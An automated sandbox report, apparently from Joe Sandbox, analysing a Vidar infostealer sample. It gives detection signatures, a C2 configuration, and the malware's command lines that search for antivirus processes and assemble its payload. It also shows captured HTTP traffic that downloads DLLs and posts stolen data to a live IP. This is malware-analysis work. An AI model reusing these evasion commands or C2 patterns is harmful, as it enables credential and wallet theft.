Edit tour

Windows Analysis Report
0dN59ZIkEM.exe

Overview

General Information

Sample name:	0dN59ZIkEM.exe renamed because original name is a hash value
Original sample name:	1a6e4128750535604181321ce27c3084.exe
Analysis ID:	1433839
MD5:	1a6e4128750535604181321ce27c3084
SHA1:	7a25a0495ac4d8718dea8baa99b671e6422e39b5
SHA256:	c418f6d5142f3f9c830a5750014cc233a12775f5d252ed02a62f45415dd6dd32
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Yara detected AntiVM3

Yara detected Vidar

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

0dN59ZIkEM.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\0dN59ZIkEM.exe" MD5: 1A6E4128750535604181321CE27C3084)

cmd.exe (PID: 6452 cmdline: "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3804 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6764 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5612 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6776 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5760 cmdline: cmd /c md 1151 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 3016 cmdline: findstr /V "NickelTruckWritersBattery" Mattress MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1988 cmdline: cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Spice.pif (PID: 752 cmdline: 1151\Spice.pif 1151\a MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

PING.EXE (PID: 4868 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Spice.pif PID: 752	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Spice.pif PID: 752	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Spice.pif PID: 752	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.Spice.pif.4810000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Sigma Signatures

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: 1151\Spice.pif 1151\a, CommandLine: 1151\Spice.pif 1151\a, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: 1151\Spice.pif 1151\a, ProcessId: 752, ProcessName: Spice.pif

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 6776, ProcessName: findstr.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Multi AV Scanner detection for domain / URL

Source: https://37.27.87.155/sqln.dll	Virustotal: Detection: 11%	Perma Link
Source: https://37.27.87.155/	Virustotal: Detection: 10%	Perma Link
Source: https://37.27.87.155	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: 0dN59ZIkEM.exe	ReversingLabs: Detection: 47%
Source: 0dN59ZIkEM.exe	Virustotal: Detection: 41%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 0dN59ZIkEM.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Unpacked PE file: 11.2.Spice.pif.10000000.2.unpack

Source: 0dN59ZIkEM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.7.115.52:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.8:49710 version: TLS 1.2

Source: 0dN59ZIkEM.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.11.dr, mozglue.dll.11.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
Source:	Binary string: nss3.pdb@ source: nss3[1].dll.11.dr, nss3.dll.11.dr
Source:	Binary string: softokn3.pdb@ source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
Source:	Binary string: nss3.pdb source: nss3[1].dll.11.dr, nss3.dll.11.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.11.dr, mozglue.dll.11.dr
Source:	Binary string: softokn3.pdb source: softokn3.dll.11.dr, softokn3[1].dll.11.dr

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ED4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_00ED4005
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ED494A GetFileAttributesW,FindFirstFileW,FindClose,	11_2_00ED494A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_00EDC2FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	11_2_00EDCD9F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDCD14 FindFirstFileW,FindClose,	11_2_00EDCD14
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_00EDF5D8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_00EDF735
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_00EDFA36
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ED3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_00ED3CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199677575543

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 37.27.87.155 37.27.87.155

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 6937Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 61029Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDHCBGDHJKEBGDGIJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 7005Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.87.155

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EE29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

11_2_00EE29BA

Source: global traffic	HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ihIVTwGgMFMSkvPLDBTLteOUVB.ihIVTwGgMFMSkvPLDBTLteOUVB
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 278Connection: Keep-AliveCache-Control: no-cache

Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: 0dN59ZIkEM.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 0dN59ZIkEM.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
